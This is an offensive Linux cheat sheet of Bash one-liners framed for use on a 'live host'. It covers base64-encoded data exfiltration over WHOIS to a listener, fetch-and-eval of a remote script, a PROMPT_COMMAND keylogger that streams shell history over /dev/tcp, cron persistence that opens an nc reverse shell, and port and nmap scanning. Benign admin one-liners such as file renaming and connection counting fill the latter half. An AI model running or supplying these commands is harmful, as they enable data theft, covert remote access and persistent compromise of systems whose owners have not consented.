Linux Tricks

Linux Tricks#

Bash one-liners for exfil, in-memory execution, scanning, persistence, and operator hygiene. Each recipe is short, narrow, and earns its place by saving a tool install on a live host.

Exfil trick#

WHOIS as a covert channel.

# 1. Ncat listen and tee to file
$ ncat -k -l -p 4444 | tee files.b64

# 2. Compress, base64, xargs WHOIS to the Ncat listener
$ tar czf - /bin/* | base64 | xargs -I bits timeout 0.03 whois -h 192.168.80.107 -p 4444 bits

# 3. Reconstruct on the listener side
$ cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv

One-liners#

In-memory exec from a remote server (works with noexec).

$ bash -c CMD="`wget -qO- http://127.0.0.1/script.sh`" && eval "$CMD"

Bash IP / port scanner.

$ for i in {1..65535}; do
    (echo < /dev/tcp/<targetIP>/$i) &> /dev/null && echo -e "\n[+] Open port at:\t$i" || (echo -n ."&&exit 1)
  done

Bash web-service screenshots over an IP range.

$ IP="192.168.0"; for p in '80' '443'; do for i in $(seq 0 5); do
    TAKE_SS=$(cutycapt --url=$IP.$i:$p --out=$IP.$i:$p.png); done; done

Bash keylogger via PROMPT_COMMAND.

PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/127.0.0.1/9000'

Cron-based persistence.

$ echo "* * * * * /bin/nc 192.168.1.10 1234 -e /bin/bash" > cron && crontab cron
# listener
$ nc -lvp 1234

Check if directory contents have changed.

$ find . -type f | sort | xargs sha1sum | sha1sum | awk '{print $1}'

Shodan via Bash one-liner.

$ for domain in $(curl <raw target domains file> | unfurl -u format '%r'); do
    shodan search <INSERT_VULN_HERE> "ssl:$domain" | awk '{print $1}' | aquatone;
  done

Grab IPs from an ASN.

$ whois -h whois.radb.net -- '-i origin AS36459' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq

Top ten largest open files.

$ lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | sort -n -u | tail

Connections to port 80 per IP.

$ clear; while x=0; do clear; date; echo ""; echo "  [Count] | [IP ADDR]";
    echo "----------"; netstat -np | grep :80 | grep -v LISTEN | awk '{print $5}' | cut -d: -f1 | uniq -c;
    sleep 5;
  done

Nmap scan every interface that has an IP.

$ ifconfig -a | grep -Po '\b(?!255)(?:\d{1,3}\.){3}(?!255)\d{1,3}\b' | xargs nmap -A -p0-

Rename items in a directory to lowercase.

$ for i in *; do mv "$i" "${i,,}"; done

Find log files modified > 24 h ago and zip them.

$ find . -type f -mtime +1 -name "*.log" -exec zip -m {}.zip {} \; >/dev/null

List IPs connected on port 80.

$ netstat -tn 2>/dev/null | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr | head

Change file encoding recursively.

$ find . -type f -name '*.java' -exec sh -c 'iconv -f cp1252 -t utf-8 "$1" > converted && mv converted "$1"' -- {} \;

Tree-like ls.

$ ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/   /' -e 's/-/|/'

Find a string in files recursively.

$ find . -name *conf* -exec grep -Hni 'matching_text' {} \; > matching_text.conf.list

Extract external IP via DNS.

$ dig +short myip.opendns.com @resolver1.opendns.com

Shred and erase without shred.

$ FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom > "${FN}"; rm -f "${FN}"

References#